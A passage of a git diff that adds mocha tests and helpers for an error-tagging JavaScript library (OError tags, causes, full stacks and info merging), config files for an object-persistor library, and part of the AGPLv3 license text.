baz(cb) { + bar(err => { + if (err) { + return cb(OError.tag(err, 'failed to baz', { baz: 'bat' })) + } + cb() + }) + } + + baz(err => { + if (err) { + expectError(err, { + name: 'Error', + klass: Error, + message: 'Error: foo error', + firstFrameRx: /_onTimeout/, + }) + expectFullStackWithoutStackFramesToEqual(err, [ + 'Error: foo error', + 'TaggedError: failed to bar', + 'TaggedError: failed to baz', + ]) + expect(OError.getFullInfo(err)).to.eql({ + bar: 'baz', + baz: 'bat', + }) + return done() + } + expect.fail('should have yielded an error') + }) + }) + + it('is not included in the stack trace if using capture', function () { + if (!Error.captureStackTrace) return this.skip() + const err = new Error('test error') + OError.tag(err, 'test message') + const stack = OError.getFullStack(err) + expect(stack).to.match(/TaggedError: test message\n\s+at/) + expect(stack).to.not.match(/TaggedError: test message\n\s+at [\w.]*tag/) + }) + + describe('without Error.captureStackTrace', function () { + /* eslint-disable mocha/no-hooks-for-single-case */ + before(function () { + this.originalCaptureStackTrace = Error.captureStackTrace + Error.captureStackTrace = null + }) + after(function () { + Error.captureStackTrace = this.originalCaptureStackTrace + }) + + it('still captures a stack trace, albeit including itself', function () { + const err = new Error('test error') + OError.tag(err, 'test message') + expectFullStackWithoutStackFramesToEqual(err, [ + 'Error: test error', + 'TaggedError: test message', + ]) + const stack = OError.getFullStack(err) + expect(stack).to.match(/TaggedError: test message\n\s+at [\w.]*tag/) + }) + }) + + describe('with limit on the number of tags', function () { + before(function () { + this.originalMaxTags = OError.maxTags + OError.maxTags = 3 + }) + after(function () { + OError.maxTags = this.originalMaxTags + }) + + it('should not tag more than that', function () { + const err = new Error('test error') + OError.tag(err, 'test message 1') + OError.tag(err, 'test message 2') + OError.tag(err, 'test message 3') + OError.tag(err, 'test message 4') + OError.tag(err, 'test message 5') + expectFullStackWithoutStackFramesToEqual(err, [ + 'Error: test error', + 'TaggedError: test message 1', + 'TaggedError: ... dropped tags', + 'TaggedError: test message 4', + 'TaggedError: test message 5', + ]) + }) + + it('should handle deep recursion', async function () { + async function recursiveAdd(n) { + try { + if (n === 0) throw new Error('deep error') + const result = await recursiveAdd(n - 1) + return result + 1 + } catch (err) { + throw OError.tag(err, `at level ${n}`) + } + } + + try { + await recursiveAdd(10) + } catch (err) { + expectFullStackWithoutStackFramesToEqual(err, [ + 'Error: deep error', + 'TaggedError: at level 0', + 'TaggedError: ... dropped tags', + 'TaggedError: at level 9', + 'TaggedError: at level 10', + ]) + } + }) + + it('should handle a singleton error', function (done) { + const err = new Error('singleton error') + + function endpoint(callback) { + helper(err => callback(err && OError.tag(err, 'in endpoint'))) + } + + function helper(callback) { + libraryFunction(err => callback(err && OError.tag(err, 'in helper'))) + } + + function libraryFunction(callback) { + callback(err) + } + + endpoint(() => { + endpoint(err => { + expect(err).to.exist + expectFullStackWithoutStackFramesToEqual(err, [ + 'Error: singleton error', + 'TaggedError: in helper', + 'TaggedError: ... dropped tags', + 'TaggedError: in helper', + 'TaggedError: in endpoint', + ]) + done() + }) + }) + }) + }) + }) + + describe('OError.getFullInfo', function () { + it('works when given null', function () { + expect(OError.getFullInfo(null)).to.deep.equal({}) + }) + + it('works on a normal error', function () { + const err = new Error('foo') + expect(OError.getFullInfo(err)).to.deep.equal({}) + }) + + it('works on an error with tags', function () { + const err = OError.tag(new Error('foo'), 'bar', { userId: 123 }) + expect(OError.getFullInfo(err)).to.deep.equal({ userId: 123 }) + }) + + it('merges info from an error and its tags', function () { + const err = new OError('foo').withInfo({ projectId: 456 }) + OError.tag(err, 'failed to foo', { userId: 123 }) + expect(OError.getFullInfo(err)).to.deep.equal({ + projectId: 456, + userId: 123, + }) + }) + + it('merges info from a cause', function () { + const err1 = new Error('foo') + const err2 = new Error('bar') + err1.cause = err2 + err2.info = { userId: 123 } + expect(OError.getFullInfo(err1)).to.deep.equal({ userId: 123 }) + }) + + it('merges info from a nested cause', function () { + const err1 = new Error('foo') + const err2 = new Error('bar') + const err3 = new Error('baz') + err1.cause = err2 + err2.info = { userId: 123 } + err2.cause = err3 + err3.info = { foo: 42 } + expect(OError.getFullInfo(err1)).to.deep.equal({ + userId: 123, + foo: 42, + }) + }) + + it('merges info from cause with duplicate keys', function () { + const err1 = new Error('foo') + const err2 = new Error('bar') + err1.info = { userId: 42, foo: 1337 } + err1.cause = err2 + err2.info = { userId: 1 } + expect(OError.getFullInfo(err1)).to.deep.equal({ + userId: 42, + foo: 1337, + }) + }) + + it('merges info from tags with duplicate keys', function () { + const err1 = OError.tag(new Error('foo'), 'bar', { userId: 123 }) + const err2 = OError.tag(err1, 'bat', { userId: 456 }) + expect(OError.getFullInfo(err2)).to.deep.equal({ userId: 456 }) + }) + + it('works on an error with .info set to a string', function () { + const err = new Error('foo') + err.info = 'test' + expect(OError.getFullInfo(err)).to.deep.equal({}) + }) + }) + + describe('OError.getFullStack', function () { + it('works when given null', function () { + expect(OError.getFullStack(null)).to.equal('') + }) + + it('works on a normal error', function () { + const err = new Error('foo') + const fullStack = OError.getFullStack(err) + expect(fullStack).to.match(/^Error: foo$/m) + expect(fullStack).to.match(/^\s+at /m) + }) + + it('works on an error with a cause', function () { + const err1 = new Error('foo') + const err2 = new Error('bar') + err1.cause = err2 + + const fullStack = OError.getFullStack(err1) + expect(fullStack).to.match(/^Error: foo$/m) + expect(fullStack).to.match(/^\s+at /m) + expect(fullStack).to.match(/^caused by:\n\s+Error: bar$/m) + }) + + it('works on both tags and causes', async function () { + // Here's the actual error. + function tryToFoo() { + try { + throw Error('foo') + } catch (error) { + throw OError.tag(error, 'failed to foo', { foo: 1 }) + } + } + + // Inside another function that wraps it. + function tryToBar() { + try { + tryToFoo() + } catch (error) { + throw new OError('failed to bar').withCause(error) + } + } + + // And it is in another try. + try { + try { + tryToBar() + expect.fail('should have thrown') + } catch (error) { + throw OError.tag(error, 'failed to bat', { bat: 1 }) + } + } catch (error) { + // We catch the wrapping error. + expectError(error, { + name: 'OError', + klass: OError, + message: 'OError: failed to bar', + firstFrameRx: /tryToBar/, + }) + + // But the stack contains all of the errors and tags. + expectFullStackWithoutStackFramesToEqual(error, [ + 'OError: failed to bar', + 'TaggedError: failed to bat', + 'caused by:', + ' Error: foo', + ' TaggedError: failed to foo', + ]) + + // The info from the wrapped cause should be picked up for logging. + expect(OError.getFullInfo(error)).to.eql({ bat: 1, foo: 1 }) + + // But it should still be recorded. + expect(OError.getFullInfo(error.cause)).to.eql({ foo: 1 }) + } + }) + + it('works when given non Error', function () { + expect(OError.getFullStack({ message: 'Foo' })).to.equal('Foo') + }) + + it('works when given non Error with tags', function () { + const error = OError.tag({ message: 'Foo: bar' }, 'baz') + expectFullStackWithoutStackFramesToEqual(error, [ + 'Foo: bar', + 'TaggedError: baz', + ]) + }) + }) +}) diff --git a/libraries/o-error/test/o-error.test.js b/libraries/o-error/test/o-error.test.js new file mode 100644 index 0000000..84244ec --- /dev/null +++ b/libraries/o-error/test/o-error.test.js @@ -0,0 +1,111 @@ +const { expect } = require('chai') + +const OError = require('..') +const { + expectError, + expectFullStackWithoutStackFramesToEqual, +} = require('./support') + +class CustomError1 extends OError { + constructor() { + super('failed to foo') + } +} + +class CustomError2 extends OError { + constructor(customMessage) { + super(customMessage || 'failed to bar') + } +} + +describe('OError', function () { + it('can have an info object', function () { + const err1 = new OError('foo', { foo: 1 }) + expect(err1.info).to.eql({ foo: 1 }) + + const err2 = new OError('foo').withInfo({ foo: 2 }) + expect(err2.info).to.eql({ foo: 2 }) + }) + + it('can have a cause', function () { + const err1 = new OError('foo', { foo: 1 }, new Error('cause 1')) + expect(err1.cause.message).to.equal('cause 1') + + const err2 = new OError('foo').withCause(new Error('cause 2')) + expect(err2.cause.message).to.equal('cause 2') + }) + + it('handles a custom error type with a cause', function () { + function doSomethingBadInternally() { + throw new Error('internal error') + } + + function doSomethingBad() { + try { + doSomethingBadInternally() + } catch (error) { + throw new CustomError1().withCause(error) + } + } + + try { + doSomethingBad() + expect.fail('should have thrown') + } catch (error) { + expectError(error, { + name: 'CustomError1', + klass: CustomError1, + message: 'CustomError1: failed to foo', + firstFrameRx: /doSomethingBad/, + }) + expect(OError.getFullInfo(error)).to.deep.equal({}) + expectFullStackWithoutStackFramesToEqual(error, [ + 'CustomError1: failed to foo', + 'caused by:', + ' Error: internal error', + ]) + } + }) + + it('handles a custom error type with nested causes', function () { + function doSomethingBadInternally() { + throw new Error('internal error') + } + + function doBar() { + try { + doSomethingBadInternally() + } catch (error) { + throw new CustomError2('failed to bar!').withCause(error) + } + } + + function doFoo() { + try { + doBar() + } catch (error) { + throw new CustomError1().withCause(error) + } + } + + try { + doFoo() + expect.fail('should have thrown') + } catch (error) { + expectError(error, { + name: 'CustomError1', + klass: CustomError1, + message: 'CustomError1: failed to foo', + firstFrameRx: /doFoo/, + }) + expectFullStackWithoutStackFramesToEqual(error, [ + 'CustomError1: failed to foo', + 'caused by:', + ' CustomError2: failed to bar!', + ' caused by:', + ' Error: internal error', + ]) + expect(OError.getFullInfo(error)).to.deep.equal({}) + } + }) +}) diff --git a/libraries/o-error/test/support/index.js b/libraries/o-error/test/support/index.js new file mode 100644 index 0000000..00d9dbb --- /dev/null +++ b/libraries/o-error/test/support/index.js @@ -0,0 +1,61 @@ +const { expect } = require('chai') + +const OError = require('../..') + +/** + * @param {Error} e + * @param {any} expected + */ +exports.expectError = function OErrorExpectError(e, expected) { + expect( + e.name, + "error should set the name property to the error's name" + ).to.equal(expected.name) + + expect( + e instanceof expected.klass, + 'error should be an instance of the error type' + ).to.be.true + + expect( + e instanceof Error, + 'error should be an instance of the built-in Error type' + ).to.be.true + + expect( + require('node:util').types.isNativeError(e), + 'error should be recognised by util.types.isNativeError' + ).to.be.true + + expect( + e.toString(), + 'toString should return the default error message formatting' + ).to.equal(expected.message) + + expect(e.stack, 'error should have a stack trace').to.not.be.empty + + expect( + /** @type {string} */ (e.stack).split('\n')[0], + 'stack should start with the default error message formatting' + ).to.match(new RegExp(`^${expected.name}:`)) + + expect( + /** @type {string} */ (e.stack).split('\n')[1], + 'first stack frame should be the function where the error was thrown' + ).to.match(expected.firstFrameRx) +} + +/** + * @param {Error} error + * @param {String[]} expected + */ +exports.expectFullStackWithoutStackFramesToEqual = function (error, expected) { + const fullStack = OError.getFullStack(error) + const fullStackWithoutFrames = fullStack + .split('\n') + .filter(line => !/^\s+at\s/.test(line)) + expect( + fullStackWithoutFrames, + 'full stack without frames should equal' + ).to.deep.equal(expected) +} diff --git a/libraries/o-error/tsconfig.json b/libraries/o-error/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/o-error/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/object-persistor/.gitignore b/libraries/object-persistor/.gitignore new file mode 100644 index 0000000..6a20893 --- /dev/null +++ b/libraries/object-persistor/.gitignore @@ -0,0 +1,4 @@ +/node_modules +*.swp + +.npmrc diff --git a/libraries/object-persistor/.mocharc.json b/libraries/object-persistor/.mocharc.json new file mode 100644 index 0000000..c212143 --- /dev/null +++ b/libraries/object-persistor/.mocharc.json @@ -0,0 +1,6 @@ +{ + "ui": "bdd", + "recursive": "true", + "reporter": "spec", + "require": "./test/Init" +} diff --git a/libraries/object-persistor/.nvmrc b/libraries/object-persistor/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/object-persistor/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/object-persistor/.prettierignore b/libraries/object-persistor/.prettierignore new file mode 100644 index 0000000..3c3629e --- /dev/null +++ b/libraries/object-persistor/.prettierignore @@ -0,0 +1 @@ +node_modules diff --git a/libraries/object-persistor/LICENSE b/libraries/object-persistor/LICENSE new file mode 100644 index 0000000..ac8619d --- /dev/null +++ b/libraries/object-persistor/LICENSE @@ -0,0 +1,662 @@ + + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM 